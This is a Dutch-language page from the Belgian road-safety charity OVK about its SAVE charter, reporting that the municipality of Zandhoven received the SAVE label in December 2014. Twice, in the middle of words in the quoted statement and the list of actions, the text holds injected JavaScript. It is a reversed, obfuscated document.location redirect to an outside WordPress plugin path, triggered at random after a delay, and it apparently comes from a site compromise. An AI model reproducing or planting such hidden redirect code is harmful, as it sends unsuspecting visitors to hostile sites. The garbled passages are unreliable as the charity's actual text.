Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Zandhoven ontvangt het SAVE-label

De 6e gemeente die in Vlaanderen het SAVE-label ontving, is Zandhoven. Het label werd uitgereikt op 17/12/2014 tijdens de kindergemeenteraad. Hun eigen woorden beschrijven het best wat het label voor hen betekent:
“De uitreiking van het SAVE-label is voor Zandhoven een belangrijk moment. Werken aan een veilige gemeente is voor het gemeentebestuur een evidentie. Het veiligheidsbeleid wordt gedragen door vele actoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren, professionelen maar ook vele enthousiaste vrijwilligers. Dank dus aan de mensen van de politie, Werkgroep Veilig Verkeer Zandhoven, schoolorganisaties, kindergemeenteraad, diensten in het gemeentehuis en nog zoveel meer.”

Tijdens hun actiejaar werkte Zandhoven onder andere aan: het oplossen van de verkeerschaos aan de gemeentelijke basisschool van Zandhoven, de verkeerssituatie aan de school ’t Zandhofje, de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegang van de school Viersel en aan hun communicatie rond veiligheid, verkeer en handhaving.

 


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be